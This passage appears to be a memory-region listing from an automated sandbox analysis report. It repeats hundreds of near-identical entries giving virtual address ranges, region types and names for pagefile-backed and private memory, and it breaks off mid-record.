id = 18901 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18902 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18903 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18904 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18905 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18906 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 18907 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 18908 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 18909 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 18910 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18911 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18912 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18913 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18914 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18915 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18916 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18917 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18918 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18919 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18920 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18921 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18922 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18923 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18924 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18925 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18926 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18927 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18928 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18929 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18930 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18931 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18932 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18933 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18934 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18935 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18936 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18937 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18938 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18939 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18940 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18941 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18942 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18943 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18944 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18945 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18946 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18947 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18948 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18949 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18950 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18951 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18952 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18953 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18954 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18955 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18956 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18957 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18958 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18959 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19090 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19091 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 19092 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 19093 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 19094 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19095 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19096 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19097 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19098 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19099 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19100 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19101 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19102 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19103 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19104 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19105 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19106 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19107 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19108 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19109 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19110 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19111 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19112 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19113 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19114 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19115 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19116 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19117 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19118 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19119 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19120 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19121 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19122 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19123 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19124 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19125 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19126 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19127 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19128 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19129 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19130 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19131 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19132 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19133 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19158 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19159 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19160 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19161 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19162 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19163 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19164 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19165 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19166 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19167 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 19168 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 19169 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 19170 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19171 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19172 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19173 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19174 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19175 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19176 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19177 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19178 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19179 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19180 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19181 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19182 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19183 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19184 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19185 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19186 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19187 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19188 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19189 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19190 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19191 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19192 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19193 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19194 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19195 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19196 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19197 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19198 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19199 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19200 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19201 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19202 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19203 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19204 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19205 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19206 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19207 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19208 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19209 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19210 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19211 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19212 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19213 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19214 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19215 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19216 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19217 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19218 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19219 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19360 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19361 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 19362 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 19363 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 19364 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19365 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19366 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19367 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19368 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19369 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19370 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19371 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19372 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19373 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19374 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19375 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19376 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19377 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19378 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19379 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19380 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19381 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19382 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19383 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19384 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19385 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19386 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19387 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19388 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19389 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19390 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19391 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 19392 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name 